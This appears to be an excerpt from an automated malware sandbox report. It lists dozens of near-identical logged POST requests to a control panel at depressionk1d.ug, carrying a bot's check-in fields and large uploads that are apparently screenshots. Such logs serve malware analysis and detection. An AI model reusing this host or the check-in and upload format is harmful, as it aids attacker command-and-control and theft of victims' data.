              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----2379f4103dba772a786c03df93bf021fHost: depressionk1d.ugContent-Length: 111558Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
